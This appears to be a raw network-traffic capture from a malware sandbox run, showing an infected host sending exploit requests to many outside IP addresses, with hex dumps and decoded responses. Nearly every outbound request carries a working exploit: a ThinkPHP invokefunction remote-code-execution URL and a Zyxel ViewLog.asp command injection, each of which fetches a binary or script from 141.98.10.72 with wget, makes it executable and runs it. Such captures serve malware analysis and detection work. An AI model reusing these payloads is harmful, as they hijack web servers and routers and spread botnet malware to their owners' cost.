                                                            Date: Tue, 08 Jan 2019 17:57:20 GMT
                                                            Server: lighttpd/1.4.39
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1029192.168.2.234308088.248.111.20180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:18.650489092 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:18.904227018 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:30:41 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1030192.168.2.234118695.100.81.19980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:18.787132978 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:18.988998890 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:18 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:18 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 36 61 30 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 38 26 23 34 36 3b 38 37 62 62 34 36 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c6a0d517&#46;1707899418&#46;87bb46be</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1031192.168.2.234904088.221.39.3480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.010346889 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:19.212712049 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:19 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 39 26 23 34 36 3b 31 38 64 66 38 37 30 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;98341060&#46;1707899419&#46;18df870d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1032192.168.2.233386095.57.202.9380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.055563927 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:19.330218077 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:30:19.330535889 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1033192.168.2.235977895.183.110.1158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.546118975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.780913115 CET308INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.22.1
                                                            Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1034192.168.2.234198031.200.0.1328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.558624029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1035192.168.2.233836494.121.39.1418080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.560055017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1036192.168.2.235295885.95.156.2028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.641928911 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.974895954 CET274INHTTP/1.0 200 OK
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1037192.168.2.235745494.130.30.628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.742333889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.951524019 CET811INHTTP/1.1 500 Internal Server Error
                                                            Date: Wed, 14 Feb 2024 08:23:13 GMT
                                                            Server: Apache/2.4.7 (Ubuntu)
                                                            Content-Length: 608
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1038192.168.2.235412694.110.5.658080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.748606920 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1039192.168.2.235888231.136.42.528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.758470058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.463855982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.871473074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.815186024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:30.446297884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:41.708901882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:04.489691019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1040192.168.2.235223894.122.66.648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:19.785176039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
